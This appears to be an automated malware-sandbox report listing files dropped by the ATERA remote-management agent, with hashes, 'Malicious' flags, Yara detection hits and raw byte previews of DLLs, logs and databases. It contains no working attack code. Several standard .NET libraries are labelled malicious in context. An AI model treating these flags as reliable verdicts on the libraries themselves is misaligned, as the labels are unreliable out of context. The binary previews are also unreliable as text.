                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.c...........!.................+... ...@....... ..............................v.....`.................................H+..S....@..p...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................+......H...........tM..........PM..J...P .......................................6K/.%.L....7.......2.x..`..P.k:k.......0\W.j...;..xX.~..HB..S@.$.m...)4..<S1...C.Y......#ku.k&..2<..i{..>....U...s.'{:.(......}....*..{....*:.(......}....*..{....*r.(......}......}......}....*..0..5........-..*~.....o.....X...v....~.......o......o .........*6..(....(....*"..(....*.0..T........~!...("...-..-.~#...*../....+...X....($...-..-.~#...*..v........(%...~.......o&...*Z.~....2..~.........

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.234006910981014
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Qzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDuyEpYi60Wt:QzpjF0/t043e3vggr83jMYa/hCT76Lt
                                                                                                                                                                                                                                                                                              MD5:E5AA555797EE6B66234B12FFC66294CF
                                                                                                                                                                                                                                                                                              SHA1:8F8E00792BA4F560CEAA0AE921AAE35686BAA1A2
                                                                                                                                                                                                                                                                                              SHA-256:5683B28288592916552AE470507C7A7C9758BF90B6C444A32DA9DB9CB0EB09C2
                                                                                                                                                                                                                                                                                              SHA-512:C1F27291F806ACC3B7E1F3788DDE7759E73CB3BA46F8F69E665AC05ED9901D8EC6A9F32C333607F4A312BE21E934C6176ED37CFAA58CEBF07F7319F79BDB9595
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.................. ........... ..............................z.....@.................................X...O.......................((.......... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........J...g..........p...0.............................................{!...*:.(".....}!...*..0..#........u......,.(#....{!....{!...o$...*.*v ..yN )UU.Z(#....{!...o%...X*....0..M........r...p......%..{!....................-.q.............-.&.+.......o&....('...*..{(...*:.(".....}(...*.0..#........u......,.(#....{(....{(...o$...*.*v ..:. )UU.Z(#....{(...o%...X*....0..M........r-..p......%..{(....................-.q.............-.&.+.......o&....('...*..{)...*..{*...*V.("...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):138280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178587040008723
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:xP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJH5:xh0qjC5RMOHO420kN1C
                                                                                                                                                                                                                                                                                              MD5:0297D137B4074D003828F8B32E0C8FA3
                                                                                                                                                                                                                                                                                              SHA1:361D49888CBC6AE53EA7A0BB9ACC794D0D7FB728
                                                                                                                                                                                                                                                                                              SHA-256:9FE2BB55D334023DCFC7925582D6A7B3A3635A0406D9F90FEADDEA8EF8CBEE48
                                                                                                                                                                                                                                                                                              SHA-512:AB474DE4267C014B4662DC71E540E0196EC1F6847B931B381C01750A81AA255EA2369BF3621C48C59E1CB8E912B91854AA190A38F9A79B8476EA1AA153FC339E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`.......o....@.................................3...O.... ..0...............((...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.671037715639926
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:yh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeBo38:yy9gpEpYi60Ah
                                                                                                                                                                                                                                                                                              MD5:C10B5E1564AF42CEC775454CAB8F5A47
                                                                                                                                                                                                                                                                                              SHA1:E23F9E1F26B751C8A69AEAE1ADEFC671E50183D2
                                                                                                                                                                                                                                                                                              SHA-256:E64018A03E1EAC23F31A32B51AB3CB5FDE9F18BED54221BFE8437DA740AE1BF5
                                                                                                                                                                                                                                                                                              SHA-512:C83D522441521BC57A3B947534499C23BAFD5DD71220A0349DD140995E8B59254DE15823B10B975347563807854441E23DEADF2B3367241893AE0FD77C35A092
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332608170737532
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:6n1VM0JrpNWDcIh6leOiDFIFBYp1+yWEpYi60V:6nvXYcIh6yFIFBYpcyX76s
                                                                                                                                                                                                                                                                                              MD5:E6EC9F19869FF3DA53F003667220A4E8
                                                                                                                                                                                                                                                                                              SHA1:2D95B5DC4EC0013D1A8CF04EA9BC54789DC5435E
                                                                                                                                                                                                                                                                                              SHA-256:AA2C8CA7B15429B23943B459A0970D5E9BCB73BAC98886B22E924DD00BD48267
                                                                                                                                                                                                                                                                                              SHA-512:02193E2983C4BBCD74C178279F19A0691AD3AEB18E4474E43A202BEC7C76BB1DCC9D76744B7AD803FEDD667D88EFE92B445908F3F1FCA87D89FC491042773A9E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ..............................O.....@.................................dW..O....`...............B..((..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73256
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.953030587257899
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:w784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAsk76nc:w7N1r9KGI04CCAskwc
                                                                                                                                                                                                                                                                                              MD5:252FD342F5758A63A2AD972A89C6AFCB
                                                                                                                                                                                                                                                                                              SHA1:7406EDF1BCF0765C5850578BF0BDE424490A3279
                                                                                                                                                                                                                                                                                              SHA-256:290366591DEB85496FD224748298F7A830587D5B438F519442E34932FD916C04
                                                                                                                                                                                                                                                                                              SHA-512:217800538609CA30957D9EA539DD68A94793EEE2F3121A14CD53D02195495F866FB17CD3414922ABA133FFBA3622FFB7C163E237B14F5D6CDB682EC7E6D1AC49
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P...............((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4019
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.255342738012416
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:8gDOYIg8OPgFOM3gYgOVOhVWgBNNXzHSxBNN4zPzRlXNzSPeZgg9dSjedcdS4dSC:Vb4oH8afhbZh9A6qA4AAADjAN
                                                                                                                                                                                                                                                                                              MD5:8194759065D93E08EF8CB2774B204096
                                                                                                                                                                                                                                                                                              SHA1:8470603A95C936FF195596ECC586987F7CA38EC7
                                                                                                                                                                                                                                                                                              SHA-256:260647229E0A266CEE9DFC32FFA136D007677A8379CE50C3B6BF32CE6A47E1FF
                                                                                                                                                                                                                                                                                              SHA-512:5304FB8B48FF944AD7F44470FC8C1E74AB44B6CA3E85160F30B92F3C8CD5D0515A26AAF9D5D4071DAD1CF5FD50F9E8754341D9C453ACAEDFCF91521B3A4AF6CD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 06:59:26.7350|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:27.8600|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:29.9225|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:32.9538|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\package_2.db

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 20, database pages 12, cookie 0xb, schema 4, UTF-8, version-valid-for 20
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9452620593376841
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:Wu5C4OoNSN1eN+5NmrjVZDzWL8OO7QzyO+pP:j5PsveM5kRtzy8OO7QzyO+p
                                                                                                                                                                                                                                                                                              MD5:D1AB2D5B09D56DBAE36C64135F840B0D
                                                                                                                                                                                                                                                                                              SHA1:9D9916968EFE7F24A453BE8EBBF753ACE883437C
                                                                                                                                                                                                                                                                                              SHA-256:0ABBA9240F2D884D1A76423F11A653E95560D097BC61A31E28006850A4513A99
                                                                                                                                                                                                                                                                                              SHA-512:D7754421444C2BD7F6976005C838800109B32B8B24280E4AA24F78F5ABDDFA32C912033FAD16DC15959881DDC566FC018B737123BBD0EA658D1824E5515A2642
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................c..............Z...?.j...I.:..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\package_2.db-journal

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.89533523931921
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:7M+qcFu5C4OZUlFJNGdNGveXXQXN+5NG1Zt:77fu5C4OoNSN1eN+5Nmt
                                                                                                                                                                                                                                                                                              MD5:0790D0AF08DAED4A4F02956089E28A66
                                                                                                                                                                                                                                                                                              SHA1:FC532C2ABB5B2A3F64B07E632C20E488EC0C6246
                                                                                                                                                                                                                                                                                              SHA-256:6C2F1B50E77A9919A4C5042856613354024D6364A64AA27B552BFF9A01135027
                                                                                                                                                                                                                                                                                              SHA-512:40157A7F14A44D8B004DA355A2CB3E9DD80CDF1981EA95E584ABD14B681C8BE2D337A4187B7BEB934EC520B6667D2366EDBFE083B37DB989C0020D1155F6BB57
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.... .c.....2.J_........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1799208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.520425420963731
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:WuvfmOhyS2RuhV0yGzcuHpRs8ulCfUk+qKuMhUwqPevJ8QNYfjmqBBLbNFEohFYi:hHmUMohVWpu8ul0UkTgNCfyo39
                                                                                                                                                                                                                                                                                              MD5:2DD13A5E8B126E524393BAA28A18AFEC
                                                                                                                                                                                                                                                                                              SHA1:9A0E98BBBDE36C58A717F2E4C7AA63437B08DE13
                                                                                                                                                                                                                                                                                              SHA-256:034E3B1EDE4A4F55BE311F2CD5EA060ED34262E6A55C0A6E9846152874E87A5A
                                                                                                                                                                                                                                                                                              SHA-512:AE4DDF208E62A23648089EE54FCA2B6F5668FD02BB687AED1C899B62620D55249F638441D576B21FD9555776888C7FF8006092E08C77A39C86FE1D07994D6715
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............g...g...g.>.....g.>...B.g.>.....g.3.....g......g...f.^.g../....g......g......g......g.Rich..g.................PE..d.....c.........." .................n...............................................6....`.........................................`t.......e..x....`.......@..`....L..((...p.........8...........................@...p...............`............................text...$........................... ..`.rdata..............................@..@.data...0........z..................@....pdata..`....@......................@..@.rsrc........`......................@..@.reloc...,...p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1475624
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.791755112478489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:US3uuk58wXpQous2GCzbHwGTzsIDQAKub0MBsIFBm5fi/5ATA9NTTPjXWJD8qB:PdwXpQdNVNDQubXyi60jXTW98qB
                                                                                                                                                                                                                                                                                              MD5:1DB9AFF80C0290760E80567C8E55BCDF
                                                                                                                                                                                                                                                                                              SHA1:F609878ECD10C56C11ED80B3C6DC875444543E6D
                                                                                                                                                                                                                                                                                              SHA-256:2F7DADC4BF447B8BB132A7BBC6D5F6FFA560B419E14403B77AAD30734006CBFD
                                                                                                                                                                                                                                                                                              SHA-512:31C55E74016721B084E0A285A17890DA5AC703C17BC346CE59346E291F03B833C12B8429AF6794D2F16DE203F912C1D88D54B666B5904270A5F4DD21E848CB79
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.rG^.!G^.!G^.!.._!d^.!..]!.^.!..^!.^.!.))!O^.!Y..!D^.!G^.!.^.!d.B!F^.!!.Z!F^.!!.Y!F^.!!.\!F^.!RichG^.!................PE..L...r.c...........!.........*.......:.......@...........................................@.........................0B..:....5..x....................\..((.........pB..8............................1..@............@..0............................text...p-.......................... ..`.rdata..j....@.......2..............@..@.data...tt...`...T...N..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2950671
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998749206513446
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:49152:Zzp6la8mL4UI0EpZQScJrHOmsBGxL16A5S4GmurSNV6lzb8E4Ow3ntOR1:OI8CVpEUBlltLolrWoznw3to
                                                                                                                                                                                                                                                                                              MD5:AB8D85C093D6F0180BF09EC0F466B78B
                                                                                                                                                                                                                                                                                              SHA1:1DAF355D14D45B1E411F96FA394A98A84C09E53E
                                                                                                                                                                                                                                                                                              SHA-256:D1E08C8DBF3BFC34E3FDFC390D2E7F5B871F95376E7DDA93E3DD0051D580DB40
                                                                                                                                                                                                                                                                                              SHA-512:2882292301E1FB85B410570ECE6CF05F3E89968A02450DBA192A1F97282F1C08ED30819E3D36C524FBA3BAEB6A2C22A10A762C8313E8823C07554B4B975CC00E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....1N.Y..F.........6...AgentPackageOsUpdates/AgentPackageOsUpdates.Common.dll....(r......I?.......'r.......kN.....r].....x.".3.0.......~....j.).[...i....G....[.\..I*...}q...p.(..!./&.ECZ..w]..Z....U|-..8.L..4.N{.3z.......~a..i.........x.....%.r..7...q..W..J....5.W).*\.Q(...;".I.UB.....*.~G......X/>..$C.R.qD.1.........9K...."ER.....Cx@p..`.....<Z.sr.^...G....wr+|....../.Z.^x..r.J?5...3.}....{(^.]...7>..7.#..B..m............M.}.../...B...I....T.n..rx9...(u"....&&..~..s......q.^...!.N6*.if._.bX.....q@HF.....=.(+..U. ..`.t.?.Xq2.\.e..}...b.0|.$.9|....I.......T.....D^.Ux......|.[Z].'.x..d...r.+Xg....&..M$J.=&M.....|n.....M..7.P^.*=$...I,..... b...+..Q.!..v%...D........K.&u.7..T+...\....A.u..\+.p..a.eI.T..{.j.pX..H.#....5Y..Lwl....7.7.....I.'..M.._{...J.$r..mEp.ZC...gFP..q^}....2)..+...35Y.$...M...>p.Nm}e........+4..@%],8..=....1d.9.6........_.S..g9.[.H..X..le......r4.'..[.N+m.v6I(RIh_..,.d.o.e..t.+D..'#u0.dw.v.T......5...'..3

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29224
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.373827321096345
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:BpWI4FJ1CsZ1pL375SImXkmlkgGIW2W8f8Mn0DpQ8fz0m1NNyb8E9VF6IYijSJI+:vlexZT375i0qvT+b7z1pEpYi606g9U
                                                                                                                                                                                                                                                                                              MD5:7C7EE1A3814D383F682C3FC35779B36A
                                                                                                                                                                                                                                                                                              SHA1:1A1FCA5A7417DA277CB1524B44ECFA58869610F9
                                                                                                                                                                                                                                                                                              SHA-256:7802C8F3F7CBC3AA4F2E0481804149F1C92FFD8BB2AB2437F9E01A7EAFAAFE33
                                                                                                                                                                                                                                                                                              SHA-512:7D50A1BB87B1FA98FBF6D54C1A53CF3C1E682DB334C9AC310442DA6440F084FB9FF32430C7E0C72EBD787905F55810D3C4846CF60A0675C2467D0BF6B53AD719
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..@..........N_... ...`....... ...............................R....`..................................^..O....`...............J..((..........@^..8............................................ ............... ..H............text...T?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................-_......H........*..`3..........................................................:.(......}....*..0..X.........(.......o......-.....>....o......2.,..o......,..o.......{....r...p...(....o..........*.(.......$..........&...........88.......0..M.........(......-.(...+..8.o....../.,..o.......{....r{..p.......(....o....(...+....*.......................&&.%.....0..].......~......o......-.~.....o..........o.....o........{....r...p......%...%...%...%...( ...o......*....................0..O...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2006
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.012466327549389
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:327h+1/gF27RgdSagFsg+w3jdgDSg+CagFPr7:K4Mw9cr7
                                                                                                                                                                                                                                                                                              MD5:DE33D7BC716E96683CCAEC7E3DECC54B
                                                                                                                                                                                                                                                                                              SHA1:6CAC5E2AE17A91F55760F3652DD1D954CFE34848
                                                                                                                                                                                                                                                                                              SHA-256:E9EC2DB29E1A7F44D6FAD976E29627E2EBCC1C9FD1797D56A69106260B70B65D
                                                                                                                                                                                                                                                                                              SHA-512:353BF5BC4E47C7218CD3EECEE83301950FAA7D48644BEA3FE2F47B5AB432D43B466EBCF8E1A1911923EC423D30682A8FA42A3EA878E7D85C8E91EC841543B887
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

